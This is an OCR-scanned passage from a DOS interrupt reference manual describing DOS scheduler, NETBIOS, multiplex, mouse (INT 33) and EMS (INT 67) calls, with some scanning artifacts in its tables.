after calling this interrupt the flags register remains on the 
stack and must be popped manually 

sectors are logical sectors starting at the beginning of a 
logical disk; each DOS partition on a drive unit is considered 
one logical drive and has it's own logical sector numbers with 
track 0 starting at the first track in the partition 

this function uses logical drives, and is susceptible to ASSIGN 
physical sector numbers can be converted to and from DOS sector 
numbers with the following formulas: 


dos_sector = (sector - 1) + (head * sectors_per_track) + 
(track * sectors_per_track * num_heads) 


physical_sector = 1 + (dos_sector MOD sectors_per_track) 
physical _head = (dos_sector / sectors_per_track) MOD num heads 
physical_track = dos_sector / (sectors_per_track * num_heads) 
see -INT 13, STATUS- 

- Terminate and Stay Resident 


offset of last byte in program to remain resident plus 1 
segment of -PSP- 


i 991 


returns nothing 


- terminates process without closing open files 
- memory beyond the offset in DX is freed 


- see -INT 21,31- 


sint 28:DOS scheduler 
AINT 28 - DOS Idle Loop / Scheduler (Undocumented) 


- issued by DOS during keyboard poll loop 

- indicates DOS may be carefully re-entered by TSR 

- used by TSR programs to popup and make DOS disk 1/0 calls 

- supported by 08/2 compatibility box 

- default behavior is to simply perform an -IRET- 

- any DOS functions above OCh may be called while in this handler 
- «INT 21,3F- and -INT 21,40- may not use a handle that refers to 
CON while in this handler 

see also —INDOS- 


AINT 29 - DOS Fast Character 1/0 (Undocumented 2.x+) 


AL = character to write 


returns nothing ??? 


- used by DOS device drivers to output data to the screen if 
bit 4 of the device attribute word is set 
- similar to -INT 21,2- and -INT 21,9- but much faster 
- simply calls the BIOS -INT 10,E- in DOS versions 2.x and 3.x 
- advances the cursor after character output 
‘int 2a 
AINT 2A - DOS Network Critical Section and NETBIOS 


% For more information see the following topics: 


-INT 2A,0- Network installation query 
-INT 2A,1- Execute NETBIOS request with no error retry 
INT 2A,2 Set network printer mode (not listed) 
-INT 2A,3- Check if direct I/0 allowed 
-INT 2A,4- Execute NETBIOS request 
-INT 2A,5- Get network resource information 
-INT 2A,6- Network print stream control 
-INT 2A,80- Begin DOS critical section 
-INT 2A,81- End DOS critical section 
-INT 2A,82- End DOS critical sections 0 through 7 
-INT 2A,84- Keyboard busy loop 
-INT 2A,87- Critical section 


- functions requests are supplied in AH 


sint 2a,0 
AINT 2A,0 - Network Installation Query 
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on return: 
zero if not installed 
nonzero if installed 


- used to detemine if a Microsoft compatible network is present 
:int 2a,1 
AINT 2A,1 - Execute NETBIOS Request With No Error Retry 


AH = 01 
ES:BX = pointer to Network Control Block 


on return: 

NETBIOS error code 
zero if success 
nonzero if error 


> 
T 
HH 


- similar to INT 5C 
:int 2a,3 
NAINT 2A,3 - Check if Direct 1/0 Allowed 


AH = 03 
DS:SI = pointer to ASCIIZ disk device name or pathname (including ":") 


on return: 
set if disk access is NOT allowed 
clear if disk access is allowed 


- do not use -INT 13-, -INT 25- or -INT 26- if this function returns 
with the CF set 
- see -INT 5F,2- 
sint 2a,4 
AINT 2A,4 - Execute NETBIOS Request 


AH = 
AL = 00 allow retry 

= 01 no retry allowed 
ES:BX = pointer to Network Control Block (NCB) 


on return: 

AX = 00 if successful 

AH = 01 if error 

AL = error code if AH = 01 


- invokes NETBIOS handler and allows retry of operation if specified 
‘int 2a,5 
NAINT 24,5 - Get Network Resource Information 


Pagina 962 di 991 


on return: 


AX = destroyed 

BX = number of available network names 
CX = number of available NCB commands 
DX = number of available sessions 


- returns information on the number of available network resources 
:int 2a,6 
NINT 2A,6 - Network Print Stream Control 


AH 
AL 


06 

01 set concatenation mode where all printer output is placed 
in one job 

= 02 set truncation mode where each printer open and printer 
close starts a new job 

03 flush printer output then start a new print job (similar to 
pressing Ctrl-Alt-Kp-* ) 


on return: 
AX = error code if CF set 


- allows control of network printers 
:int 2a,80 
AINT 2A,80 - Begin DOS Critical Section 


AH 
AL 


goh 

critical section identifier (00-0F) 

01 DOS kernel, SHARE.EXE and network data structure integrity 
DOS kernel, device driver exclusivity 

05 IFSFUNC (Installable File System, IFS, DOS 4.0+) 

06 IFSFUNC (Installable File System, IFS, DOS 4.0+) 

08 ASSIGN.COM 


HH HH HH 
© 
N 


returns nothing 


- indicates that the region of code being entered should not be 
interrupted and identifies the critical region 
- this function is not normally called by user applications but is 
often hooked to monitor if DOS is in a critical section 
- this information is necessary to reenter DOS using the swappable 
data area returned by -INT 21,5D- subfunction OB 
- see -Bibliography- reference to "Undocumented DOS" 
:int 2a,81 
AINT 2A,81 - End DOS Critical Section 


AH 
AL 


81h 

critical section identifier (00-0F) 

01 DOS kernel, SHARE.EXE and network data structure integrity 
DOS kernel, device driver exclusivity 

05 IFSFUNC (Installable File System, IFS, DOS 4.0+) 

06 IFSFUNC (Installable File System, IFS, DOS 4.0+) 

08 ASSIGN.COM 


HH HH HO HI 
© 
N 


returns nothing 


Pagina 963 di 991 


- indicates that a critical code section is being exited 


- this function is usually hooked rather then called directly from a 
user application 
- see -Bibliography" reference to "Undocumented DOS" 
:int 2a,82 
NAINT 2A,82 - End DOS Critical Sections 0 thru 7 


AH = 82h 
returns nothing 


- the DOS function dispatcher calls this function during DOS 
function 00, functions above 0C (excluding function 59h) and 
during process termination 


- this function is usually hooked rather then called directly from 
a user application 
- see -Bibliography- reference to "Undocumented DOS" 
:int 2a,84 
NAINT 2A,84 - Keyboard Busy Loop 


AH = 84h 
returns nothing 


- allows other processes to continue while waiting for keyboard 
input, similar to -INT 28- 
- see BIBLIO reference to "Undocumented DOS" 
‘int 2a,87 
NINT 2A,87 - Critical Section 


AH 
AL 


87h 
00 start critical section 
01 end critical section 


returns nothing 


- specifies the start or end of a critical section 

- called by PRINT.COM 

- see -Bibliography- reference to "Undocumented DOS" 
sint 2e 
AINT 2E - Execute Command Using Base Level Command Interpreter 
A(Undocumented DOS 2.0+) 


DS:SI = pointer to command string to be executed 


returns nothing ??? 


- causes the base level COMMAND.COM to execute a command as if it 
were typed from the keyboard 

- the transient portion of COMMAND.COM must be loaded if not resident 

- first byte of the string contains the string length, inclusive 

- command string must be terminated with a CR 


- all registers including SS & SP are destroyed; SS & SP should be 
preserved in your own code segment 
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- can be used to modify parents environment with SET command 
- incompatible under some software multitasking systems 
- before returning to the parent program this interrupt will 
attempt to execute the "current" batch file (if the parent or 
any ancestors were invoked from a batch file. This can cause 
remaining lines in a batch file to execute before the parent 
program finishes and fragment memory 
‘int 2f:multiplex interrupt 
AINT 2F - DOS Multiplex Interrupt 


% For more information see the following topics: 


UAAAARA ERROR CODES AAAA 


-INT 2F,0- Get installed state 3 01 Invalid function 
-INT 2F,1- Submit file 3 02 File not found 
-INT 2F,2- Cancel file 3 03 Path not found 
-INT 2F,3- Cancel all files 3 04 Too many files 
-INT 2F,4- Pause / return status 3 05 Access denied 
-INT 2F,5- End of status 3 08 Queue full 
-INT 2F,8- DRIVER.SYS support 3 09 Busy 
-INT 2F,2E- Error Translation Tables 3 OC Name too long 
3 0F Invalid drive 


- function request is specified in AL or AH 
- see -—-INT 2F,0- for installation checks 
- INT 2F uses AL to specify most documented functions but occasionally 
uses AH also. This can be quite confusing so INT 2F functions using 
AH are not currently listed if the conflict but will be added at a 
later time. 
sint 2f,0 
AINT 2F,0 - DOS Multiplex Interrupt - Get Installed State 


AL = 00 
AH = 00 DOS 2.x PRINT.COM (undocumented, see note below) 
01 PRINT (undocumented behavior also, see note below) 


05 Critical error handler (undocumented DOS 3.0+) 
06 ASSIGN (see note) 
08 DRIVER.SYS (undocumented DOS 3.2+) 
10 SHARE 
11 Redirector/IFS is resident 
12 MultiDOS is resident 
13. Swap 13h and 19h 
14. NLSFUNC 
15 GRAPHICS.COM (see note below) 
MS CD-ROM extension (MSCDEX) (see note below) 
16 Windows 386 
17 DOS shell 
19 SHELLB.COM (DOS 4.0 only) 
1A ANSI.SYS (DOS 4.0+) 
1B XMA2EMS.SYS 
40 0S/2 compatibility box 
43 Himem XMS driver 
TA Novell Netware IPX 
AD DISPLAY.SYS internal (DOS 3.3+) 
AE DOS installable command extension (DOS 3.3+) 
BO GRAFTABL.COM (DOS 3.3+) 
B4 IBM 3270 emulation 
B7 APPEND (DOS 3.3+) 
B8 LAN existence 
B9 LAN RECEIVER.COM 
BF. LAN REDIRIFS.EXE 
C0-FF reserved for user applications 
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on 
AL 


:int 2f, 
NINT 2F, 


AL 
AH 


DS 


DS: 


on 
ES 


:int 2f, 
NINT 2F, 


AL 
AH 


DS: 


re 


:int 2f, 
NINT 2F, 


AL 
AH 


return: 

00 not installed, ok to install 
01 not installed, do NOT install 
FF installed 


the installed test for append returns non-zero if installed; 

zero if not installed 

AH = 00 and 01 are used by DOS 2.x PRINT.COM and is not a check 
for installed state, see BIBLIO reference to "Undocumented DOS" 
ASSIGN returns non-zero if installed 

installation checks with AH=15 do not follow the standard format; 
see -—Bibliography- reference to "Undocumented DOS" 

1:DOS multiplex 

1 - Multiplex Interrupt - Submit file 


01 resident portion of PRINT 

02 resident portion of ASSIGN 

06 get pointer to ASSIGN drive translation table (undoc DOS 3+) 
10 resident portion of SHARE 

B7 resident portion of APPEND 

C0-FF reserved for user applications 

:DX = pointer to a 5 byte packet containing an priority byte 

and a DWORD pointer to an ASCIIZ filename 


DI 

return: 

= segment of ASSIGN work area and assignment table (AH=6 only) 
2 

2 - Multiplex Interrupt - Cancel file 


01 resident portion of PRINT 

02 resident portion of ASSIGN 

10 resident portion of SHARE 

B7 resident portion of APPEND 

C0-FF reserved for user applications 

DX = pointer to ASCIIZ filename to cancel 


turns nothing 


accepts wildcards 


3 
3 - Multiplex Interrupt - Cancel all files 


01 resident portion of PRINT 

02 resident portion of ASSIGN 

10 resident portion of SHARE 

B7 resident portion of APPEND 

C0-FF reserved for user applications 


returns nothing 
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‘int 2f,4 
AINT 2F,4 - Multiplex Interrupt - Pause / return status 


AL = 04 
AH = 01 resident portion of PRINT 

02 resident portion of ASSIGN 

10 resident portion of SHARE 

B7 resident portion of APPEND 

C0-FF reserved for user applications 
on return: 


DX = error count 
DS:SI = pointer to queue of files 


- each file in the queue is represented by 64 byte filename 
- the file currently being printed is the first entry in the queue 
- the last entry in the queue is a null string 


‘int 2f,5 
NAINT 2F,5 - Multiplex Interrupt - End of Status 


AL = 05 
AH = 01 resident portion of PRINT 

02 resident portion of ASSIGN 

10 resident portion of SHARE 

B7 resident portion of APPEND 

C0-FF reserved for user applications 
on return: 


AH = error code (see -INT 2F-) 


:int 2f,6 
AINT 2F,6 - PRINT.COM Check for Error on Output Device (Undocumented) 


AL = 06 
AH = 01 
on return: 


AX = error code if CF set 
= 00 on success 
DS:SI = device driver header if CF set 


- checks the output device for an error condition 
- undocumented, available since DOS 3.3+ 


:int 2f,8 

NINT 2F,8 - DRIVER.SYS Support (Undocumented DOS 3.2+) 
AH 08 
AL 00 installation check 


add new block device 

02 execute device driver request 

03 get drive data table list (DOS 4.0+) 
DS:DI = pointer to drive data table (AL=01) 


HH HH N 
© 
p 
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ES:BX = pointer to device driver request header (AL=02) 


3 
D 
ct 
c 
3 
> 


on 
AL 00 not installed, ok to install (AL=00) 
01 not installed, do NOT install (AL=00) 
FF installed (AL=00) 


= updated device request header (AL=02) 


ES: 


dd 
x 


- function 01 scans DOS's drive data tables and appends the new 
data table to to the chain. All tables referencing the same 
physical drive are updated 


:int 2f,2e 
AINT 2F,2E - Setup Error Code Translation Tables (undoc. DOS 4.x+) 


- discovered in DOS 4.x by Jim Kyle, this function provides more 
detailed information on the pending critical error. 


sint 2f,80 
NAINT 2F,80 - PRINT.COM Time Slice Allotment (Undocumented DOS 3.1+) 


AL 
AH 


80h 
00 


returns nothing 


- DOS PRINT.COM is given a time slice 
‘int 33:mouse interrupt:mouse services 
AINT 33 - Mouse Function Calls 


% For more information see the following topics: 


-INT 33,0- Mouse Reset/Get Mouse Installed Flag 

-INT 33,1- Show Mouse Cursor 

-INT 33,2- Hide Mouse Cursor 

-INT 33,3- Get Mouse Position and Button Status 

-INT 33,4- Set Mouse Cursor Position 

-INT 33, 5- Get Mouse Button Press Information 

-INT 33, 6- Get Mouse Button Release Information 

-INT 33,7- Set Mouse Horizontal Min/Max Position 

-INT 33,8- Set Mouse Vertical Min/Max Position 

-INT 33,9- Set Mouse Graphics Cursor 

-INT 33, A- Set Mouse Text Cursor 

-INT 33,B- Read Mouse Motion Counters 

-INT 33,C- Set Mouse User Defined Subroutine and Input Mask 
-INT 33, D- Mouse Light Pen Emulation On 

-INT 33, E- Mouse Light Pen Emulation Off 

-INT 33,F- Set Mouse Mickey Pixel Ratio 

-INT 33,10- Mouse Conditional OFF 

-INT 33,13- Set Mouse Double Speed Threshold 

-INT 33,14- Swap interrupt subroutines 

-INT 33,15- Get mouse driver state and memory requirements 
-INT 33, 16- Save mouse driver state 

-INT 33, 17- Restore mouse driver state 

-INT 33, 18- Set alternate subroutine call mask and address 
-INT 33,19- Get user alternate interrupt address 

-INT 33, 1A- Set mouse sensitivity 

-INT 33, 1B- Get mouse sensitivity 

-INT 33, 1C- Set mouse interrupt rate (InPort only) 
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-INT 33, 1D- Set mouse CRT page 

-INT 33, 1E- Get mouse CRT page 

-INT 33, 1F- Disable mouse driver 

-INT 33,20- Enable mouse driver 

-INT 33,21- Reset mouse software 

-INT 33, 22- Set language for messages 

-INT 33,23- Get language number 

-INT 33,24- Get driver version, mouse type & -IRQ- number 


- function is specified in AX 

- a mickey is 1/200 inches 

- for additional information see your vendor documentation 
- function number occupies all of AX rather than AH 


AMouse functions can be broken down into the following classes: 


% 


% 


% 


% 


% 


% 


% 


Mouse Driver Control / Feedback Functions 

-INT 33,0- Mouse Reset/Get Mouse Installed Flag 

-INT 33,15- Get Mouse Driver State and Memory Requirements 
-INT 33,16- Save Mouse Driver State 

-INT 33,17- Restore Mouse Driver State 

-INT 33, 1C- Set Mouse Interrupt Rate (InPort only) 

-INT 33, 1F- Disable Mouse Driver 

-INT 33,20- Enable Mouse Driver 

-INT 33,21- Reset Mouse Software 

-INT 33,24- Get Driver Version, Mouse Type & IRQ Number 


Mouse Cursor Control Functions 

-INT 33,1- Show Mouse Cursor 

-INT 33,2- Hide Mouse Cursor 

-INT 33,4- Set Mouse Cursor Position 

-INT 33,7- Set Mouse Horizontal Min/Max Position 
-INT 33,8- Set Mouse Vertical Min/Max Position 
-INT 33,9- Set Mouse Graphics Cursor 

-INT 33,A- Set Mouse Text Cursor 

-INT 33,F- Set Mouse Mickey Pixel Ratio 

-INT 33,10- Mouse Conditional OFF 

-INT 33,13- Set Mouse Double Speed Threshold 
-INT 33, 1A- Set Mouse Sensitivity 

-INT 33, 1B- Get Mouse Sensitivity 


Mouse Button and Position Feedback Functions 

-INT 33,3- Get Mouse Position and Button Status 
-INT 33, 5- Get Mouse Button Press Information 
-INT 33, 6- Get Mouse Button Release Information 
-INT 33,B- Read Mouse Motion Counters 


Video Control and Feedback Functions 
-INT 33, 1D- Set Mouse CRT Page 
-INT 33, 1E- Get Mouse CRT Page 


Mouse Interrupt Setup Functions 
-INT 33,C- Set Mouse User Defined Subroutine and Input Mask 
-INT 33,14- Swap Interrupt Subroutines 


Alternate Mouse Interrupt Setup Functions 
-INT 33, 18- Set Alternate Subroutine Call Mask and Address 
-INT 33,19- Get User Alternate Interrupt Address 


Light Pen Emulation Functions 
-INT 33, D- Mouse Light Pen Emulation On 
-INT 33,E- Mouse Light Pen Emulation Off 
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% International Language Support Functions 
-INT 33, 22- Set Language for Messages 
-INT 33,23- Get Language Number 


‘int 33,0 

NAINT 33,0 - Mouse Reset/Get Mouse Installed Flag 
AX = 00 
on return: 


AX = 0000 mouse driver not installed 
FFFF mouse driver installed 
BX = number of buttons 


- resets mouse to default driver values: 


mouse is positioned to screen center 

mouse cursor is reset and hidden 

no interrupts are enabled (mask = 0) 

double speed threshold set to 64 mickeys per second 
horizontal mickey to pixel ratio (8 to 8) 

vertical mickey to pixel ratio (16 to 8) 

. max width and height are set to maximum for video mode 
‘int 33,1 
NAINT 33,1 - Show Mouse Cursor 


returns nothing 
- increments the cursor flag; the cursor is displayed if flag 
is zero; default flag value is -1 


:int 33,2 
NAINT 33,2 - Hide Mouse Cursor 


returns nothing 


- decrements cursor flag; hides cursor if flag is not zero 


:int 33,3 
NAINT 33,3 - Get Mouse Position and Button Status 


AX = 03 

on return: 

CX = horizontal (X) position (0..639) 
DX = vertical (Y) position (0..199) 
BX = button status: 
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3F-8°7363534333231303 Button Status 
3 3 3 3 3 s 3 s AAAAA left button (1 
3 3 3 s 3 s 3 AAAAAA right button (1 
AAAAAAAAAAAAAAAKAAAKA unused 


pressed) 
pressed) 


- values returned in CX, DX are the same regardless of video mode 


‘int 33,4 
NINT 33,4 - Set Mouse Cursor Position 


AX = 4 
CX = horizontal position 
DX = vertical position 


returns nothing 


- default cursor position is at the screen center 
- the position must be within the range of the current video mode 
- the position may be rounded to fit screen mode resolution 


:int 33,5 
NINT 33,5 - Get Mouse Button Press Information 


AX = 5 
BX = 0 left button 
1 right button 
on return: 
BX = count of button presses (0-32767), set to zero after call 
CX = horizontal position at last press 
DX = vertical position at last press 
AX = status: 
8F-837363534333231303 Button Status 
3 3 3 3 3 s 3 s AAAAA left button (1 = pressed) 
3 3 3 s 3 s 3 AAAAAA right button (1 = pressed) 
AAAAAAAAAAAAAAAAAAAKA unused 
:int 33,6 


NAINT 33,6 - Get Mouse Button Release Information 


AX = 6 
BX = 0 left button 
1 right button 
on return: 
BX = count of button releases (0-32767), set to zero after call 
CX = horizontal position at last release 
DX = vertical position at last release 
AX = status 


3F-8°7363534333231303 Button status 
3 3 3 3 3 s 3 s AAAAA left button (1 
3 3 3 s 3 s 3 AAAAAA right button (1 
AAAAAAAAAAAAAAAAAAAKA unused 


pressed) 
pressed) 
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‘int 33,7 
NINT 33,7 - Set Mouse Horizontal Min/Max Position 


AX = 7 
CX = minimum horizontal position 
DX = maximum horizontal position 


returns nothing 


- restricts mouse horizontal movement to window 
- if min value is greater than max value they are swapped 


‘int 33,8 
NAINT 33,8 - Set Mouse Vertical Min/Max Position 


AX = 8 
CX = minimum vertical position 
DX = maximum vertical position 


returns nothing 


- restricts mouse vertical movement to window 
- if min value is greater than max value they are swapped 


:int 33,9 
AINT 33,9 - Set Mouse Graphics Cursor 


AX = 9 
BX = horizontal hot spot (-16 to 16) 
CX = vertical hot spot (-16 to 16) 


ES:DX = pointer to screen and cursor masks (16 byte bitmap) 


returns nothing 


- screen mask is AND'ed to screen Cursor Mask is x0R'ed 
- bytes 0-7 form the screen mask bitmap 
- bytes 8-F form the cursor mask bitmap 


‘int 33,a 
NINT 33,A - Set Mouse Text Cursor 


AX = 0A 
BX = 00 software cursor 
01 hardware cursor 
CX = start of screen mask or hardware cursor scan line 
DX = end of screen mask or hardware cursor scan line 


returns nothing 


sint 33,b 
AINT 33,B - Read Mouse Motion Counters 
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on return: 
CX = horizontal mickey count (-32768 to 32767) 
DX = vertical mickey count (-32768 to 32767) 


- count values are 1/200 inch intervals (1/200 in. = 1 mickey) 


sint 33,C 
NAINT 33,C - Set Mouse User Defined Subroutine and Input Mask 


AX = 0C 
ES:DX = far pointer to user interrupt 
CX = user interrupt mask: 


3F-534333231303 user interrupt mask in CX 
3 3 s 3 s AAAA cursor position changed 
3 3 3 3 AAAAA left button pressed 
3 3 3 AAAAAA left button released 
3 3 AAAAAAA right button pressed 
3 AAAAAAAA right button released 
AAAAAAAAAA unused 


returns nothing 

- routine at ES:DX is called if an event occurs and the 
corresponding bit specified in user mask is set 

- routine at ES:DX receives parameters in the following 


registers: 


condition mask causing call 


CX = horizontal cursor position 
DX = vertical cursor position 
DI = horizontal counts 
SI = vertical counts 
DS = mouse driver data segment 
BX = button state: 
3F-231303 
3 3 AAAA left button (1 = pressed) 
3 AAAAA right button (1 = pressed) 


AAAAAAA unused 
- initial call mask and user routine should be restore on exit 
from user program 
- user program may need to set DS to it's own segment 
- see -INT 33, 14- 


:int 33,d 
AINT 33,D - Mouse Light Pen Emulation On 


returns nothing 
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- turns on light pen emulation; the light pen is considered 
down when both buttons are down; when both buttons are 
up the pen is considered off screen 

- see -INT 33,E- 


‘int 33,e 
AINT 33,E - Mouse Light Pen Emulation Off 


returns nothing 


- disables light pen emulation 
- see -INT 33,D- 


:int 33,f 
AINT 33,F - Set Mouse Mickey Pixel Ratio 


AX = 0F 
CX = horizontal ratio (1..32767, default 8) 
DX = vertical ratio (1..32767, default 16) 


returns nothing 


- sets the ratio between physical cursor movement (mickeys) and 
screen coordinate changes 
- CX and DX must be unsigned (high bit must be 0) 


:int 33,10 
NAINT 33,10 - Mouse Conditional OFF 


AX = 10h 

CX = upper Xx screen coordinate 
DX = upper Y screen coordinate 
SI = lower X screen coordinate 
DI = lower Y screen coordinate 


returns nothing 


- defines screen region for updating in which the mouse is hidden 
if found these coordinates (INT 33,1 must be used to turn cursor 
on again) 


- see -INT 33,1- 
‘int 33,13 
NAINT 33,13 - Set Mouse Double Speed Threshold 


AX 
DX 


13h 
threshold speed (mickeys per second, default 64) 
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returns nothing 


- cursor speed is doubled when the cursor moves across the screen 
at the threshold speed 


‘int 33,14 
AINT 33,14 - Swap Interrupt Subroutines 


AX = 14h 
ES:DX = far pointer to user routine 
CX = user interrupt mask: 


3F-837363534333231303? user interrupt mask in CX 
3 3 3 s 3 s 3 s AAAA cursor position changed 

3 3 3 AAAAA left button pressed 

3 3 AAAAAA left button released 


on return: 
CX = previous user interrupt mask 
ES:DX = far pointer to previous user interrupt 


- routine at ES:DX is called if an event occurs and the 
corresponding bit specified in user mask is set 

- routine at ES:DX receives parameters in the following 
registers: 


condition mask causing call 


CX = horizontal cursor position 
DX = vertical cursor position 
DI = horizontal counts 
SI = vertical counts 
DS = mouse driver data segment 
BX = button state: 
3F-231303 
3 3 AAAA left button (1 = pressed) 
3 AAAAA right button (1 = pressed) 


\AAAAKA unused 


- initial call mask and user routine should be restore on exit 
from user program 

- user program may need to set DS to it's own segment 

- see -INT 33,C- 


:int 33,15 
NAINT 33,15 - Get Mouse Driver State and Memory Requirements 


AX = 15h 


on return 
BX = buffer size need to hold current mouse state 


- used before mouse functions 16h and 17h to determine memory 
needed to save mouse state before giving up control of mouse 
to another program 
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:int 33,16 
NINT 33,16 - Save Mouse Driver State 


AX = 16h 
ES:DX = far pointer to mouse state save buffer 


returns nothing 


- used to save mouse information before relinquishing control 
to another programs mouse handler 
- see -INT 33,15- -INT 33,17- 


‘int 33,17 
NINT 33,17 - Restore Mouse Driver State 


AX = 17h 
ES:DX = far pointer to mouse state save buffer 


returns nothing 


- used to restore mouse information after regaining control 
from another programs mouse handler 
- see -INT 33,15- -INT 33,16- 


:int 33,18 
NAINT 33,18 - Set alternate subroutine call mask and address 


AX 
DX 
CX 


18h 
offset to function 
user interrupt mask: 


3F- FASO: user interrupt mask in CX 

3 3 3 3 3 AAAA alt key pressed during event 
3 3 s 3 AAAAA ctrl key pressed during event 
3 3 3 AAAAAA shift key pressed during event 
3 3 AAAAAAA right button up event 

3 AAAAAAAA right button down event 
AAAAAAAAA left button up event 

_AAAAAAAARA left button down event 


/ W V WU Wd W W W W 


c 
o) 
c 
v 
D 
(ol 


- entire mask is set to zero when -INT 33,0- is called 

- up to three handlers may be defined with this call 

- mask should be cleared before program exit 

- when handler is called it receives parameters in the following 
registers: 


condition mask causing call 


CX = horizontal cursor position 
DX = vertical cursor position 
DI = horizontal counts 

SI = vertical counts 

DS = mouse driver data segment 
BX = button state: 
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3F-231303 
: 3 AKKA left button (1 
3 RESTA right button (1 
AAKKAAK unused 


pressed) 
pressed) 


:int 33,19 

NAINT 33,19 - Get User Alternate Interrupt Address 
AX = 19h 
CX = user interrupt call mask (see below) 
on return: 


BX:DX = user interrupt vector 
CX = user interrupt call mask or zero if not found 


3F-837363534333231303? user interrupt mask in CX 

3 3 3 3 3 3 s 3 AAAA alt key pressed during event 
3 3 s 3 s AAAAA ctrl key pressed during event 
3 3 3 3 AAAAAA shift key pressed during event 
3 s 3 AAAAAAA right button up event 
3 3 AAAAAAAA right button down event 
3 AAAAAAAAA left button up event 
AAAAAAAAAA left button down event 
AAAAAAAAAAKA cursor moved 


“VW _W W W W W 


c 
i 
(ui 
v 
D 
(ol 


- returns vector to function defined by -INT 33,18- 
- searches the event handlers defined by INT 33,18 for a routine 
with a call mask matching CX 


:int 33,1a 
AINT 33, 1A - Set Mouse Sensitivity 


AX = 1A 

BX = horizontal coordinates per pixel (6 100) 
CX = vertical coordinates per pixel (6 100) 
DX = double speed threshold 


returns nothing 


- sets mouse sensitivity by setting the ratio of the mouse 
coordinates per screen pixel 
- provides same results as calls to both -INT 33,F- and -INT 33,13- 
- these values are not reset by -INT 33,0- 
:int 33,1b 
AINT 33,1B - Get Mouse Sensitivity 


AX = 1B 
on return: 
BX horizontal coordinates per pixel (6 100) 


CX = vertical coordinates per pixel (6 100) 
= double speed threshold 


- returns mouse sensitivity information as the number of mouse 
coordinates per screen pixel 
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sint 33,1C 
AINT 33,1C - Set Mouse Interrupt Rate (InPort only) 


AX = 1C 

BX = rate code 
= 0 no interrupts 
= 1 30 interrupts per second 
= 2 50 interrupts per second 
= 3 100 interrupts per second 
= 4 200 interrupts per second 


- work with the InPort mouse only 

- sets the rate the mouse status is polled by the mouse driver 
- faster rates provide better resolution but take away CPU time 
- values in BX > 4 can cause unpredicatable results 


:int 33,1d 
NAINT 33, 1D - Set Mouse CRT Page 


AX 
BX 


1D 
CRT page number 


returns nothing 
- sets the CRT page which the mouse cursor is displayed 
- see —-VIDEO PAGES- 


:int 33,1e 
NAINT 33, 1E - Get Mouse CRT Page 


on return: 
BX = CRT page number cursor is displayed on 


- see -VIDEO PAGES- 
sint 33,1f 
NINT 33,1F - Disable Mouse Driver 


AX = 1F 


on return: 
AX = 001F if successful 
FFFF if error 
ES:BX = previous —INT 33- vector 


- restores vectors for -INT 10- and INT 71 (8088/86) or INT 74 (286+) 
- -INT 33- interrupt vector (software) is not affected 
- use of the vector returned in ES:BX to restore the previous INT 33 
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vector can cause problems since it contains the value of INT 33 
before the driver was installed; any other hooks into INT 33 set 
after driver installation will not receive service 


:int 33,20 
NINT 33,20 - Enable Mouse Driver 


AX = 20h 


returns nothing 


- reinstalls the mouse drivers interrupt vectors for INT 10 and 
INT 71 (8088/86) and INT 74 (286/386) 
- see -INT 33, 1F- 


:int 33,21 
NINT 33,21 - Reset Mouse Software 


AX = 21h 


on return: 

AX = 0021 mouse driver not installed 
FFFF mouse driver installed 

BX = 2 mouse driver installed 


- similar to -INT 33,0- but does not reset the mouse hardware or 
display variables 

- both AX and BX must be correct for successful reset 

- interrupt routines set through -INT 33,18- are preserved 

- resets the mouse to the following defaults: 


mouse is positioned to screen center 

mouse cursor is reset and hidden 

no interrupts are enabled (mask = 0) 

double speed threshold set to 64 mickeys per second 
horizontal mickey to pixel ratio (8 to 8) 

vertical mickey to pixel ratio (16 to 8) 

max width and height are set to maximum for video mode 


‘int 33,22 
AINT 33,22 - Set Language for Messages 
AX = 22h 
BX = language number (with /L switch value): 
= 0 English n/a 
=1 French F 
= 2 Dutch NL 
= 3 German D 
= 4 Swedish S 
= 5 Finnish SF 
= 6 Spanish E 
= 7 Portuguese P 
= 8 Italian I 


returns nothing 


- only works with international version of the mouse driver 
- see -INT 33,23- 
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:int 33,23 
AINT 33,23 - Get Language Number 


AX = 23h 

on return: 

BX = language number (with /L switch value): 
= 0 English n/a 
= 1 French F 
= 2 Dutch NL 
= 3 German D 
= 4 Swedish S 
= 5 Finnish SF 
= 6 Spanish E 
= 7 Portuguese P 
= 8 Italian I 


- only works with international version of the mouse driver 
- returns English (0) if not international version 


- see -INT 33,22- 
:int 33,24 
AINT 33,24 - Get Driver Version, Mouse Type & IRQ Number 


AX = 24h 
on return 
BH = major version (see below) 
BL = minor version (see below) 
CH = mouse type: 

SA bus mouse 

2 serial mouse 

= 3 InPort mouse 

= 4 PS/2 mouse 

= 5 Hewlett Packard mouse 
CL = IRQ number: 

= 0 PS/2 

= 2 -IRQ- 2 

5 IRQ 5 

= 7 IRQ 7 


- version 6.1 would be represented as BH = 06h, BL = 10h 
‘int 4a 
AINT 4A - RTC Alarm Handler Vector 


- not a true interrupt, but a pointer to an alarm handler routine 
- called by -INT 70- and enabled by -INT 1A,6- 
- routine must exit via IRET 


sint 67:EMS services 
AINT 67 - Expanded Memory Specification 


% For more information, see the following topics: 


-INT 67,40- Get EMM Status 

-INT 67,41- Get Page Frame Base Address 

-INT 67,42- Get Page Counts 

-INT 67,43- Get Handle and Allocate Pages 

-INT 67,44- Map Logical Page Into Physical Page Window 
-INT 67,45- Release Handle and Memory Pages 
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-INT 
-INT 
-INT 
-INT 
-INT 
-INT 
-INT 
-INT 
-INT 
-INT 
-INT 
-INT 
-INT 
-INT 
-INT 
-INT 
-INT 
-INT 
-INT 
-INT 
-INT 
-INT 
-INT 
-INT 
-INT 


67,46- Get EMM Version 

67,47- Save Page Map Context 

67,48- Restore Page Map Context 

67,49- Get I/0 Port Addresses 

67,4A- Get Logical to Physical Page Mapping 
67,4B- Get Handle Count 

67,4C- Get Page Count for Handle 

67,4D- Get Page Count for All Handles 

67,4E- Get/Set Page Map Context 

67,4F- Get/Set Partial Page Map 

67,50- Map/Unmap Multiple Handle Pages 
67,51- Reallocate Pages 

67,52- Get/Set Handle Attributes 

67,53- Get/Set Handle Name 

67,54- Get Handle Directory 

67,55- Alter Page Map and Jump 

67,56- Alter Page Map and Call 

67,57- Move/Exchange Memory Region 

67,58- Get Mappable Physical Address Array 
67,59- Get Expanded Memory Hardware Information 
67,5A- Allocate Standard/Raw Pages 

67,5B- Alternate Map Register Set DMA Registers 
67,5C- Prepare Expanded Memory for Warm Boot 
67,5D- Enable/Disable 0S Functions 

67,60- Get Physical Window Array 


- function number is specified in AH 
- see -EMS STATUS- 


sint 67,40: 
NINT 67,40 


AH = 


EMS status 
- Get EMM Status (LIM EMS 3.0+) 


40h 


on return: 


